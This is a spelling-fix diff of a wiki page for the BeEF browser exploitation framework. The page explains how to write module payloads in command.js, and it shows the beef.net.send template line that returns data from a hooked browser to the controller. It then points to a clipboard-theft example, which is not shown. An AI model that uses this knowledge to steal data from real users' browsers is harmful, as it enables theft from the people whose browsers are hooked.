partrickJhonson/beef/Module-creation.md

   end
 ```

-* **@datastore** is a dictionnary of information returned by the javascript payload
+* **@datastore** is a dictionary of information returned by the JavaScript payload
-* The function define a dictionnary and save it with the **save** function.
+* The function define a dictionary and save it with the **save** function.

 ## <a name="javascriptpayload"/>Javascript payload

-The last mandatory file is the javascript payload **command.js**.
-The javascript payload should be included in a function called by **beef.execute**.
+The last mandatory file is the JavaScript payload **command.js**.
+The JavaScript payload should be included in a function called by **beef.execute**.
 Except that you can do anything you want here.

 The following command should be used to return information to the BeEF controller :
 ```erb
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");
 ```

-The BeEF javascript API already includes a lot of interesting features and embed jQuery.
+The BeEF JavaScript API already includes a lot of interesting features and embed jQuery.
 You can see details on this API [[here|Javascript-API]].
 If you think that some functions of your module may improve the global API, look the [[relevant section|Javascript-API#wiki-improve]].

 Here is an interesting example taken from [clipboard_theft](https://github.com/beefproject/beef/blob/master/modules/host/clipboard_theft/command.js) :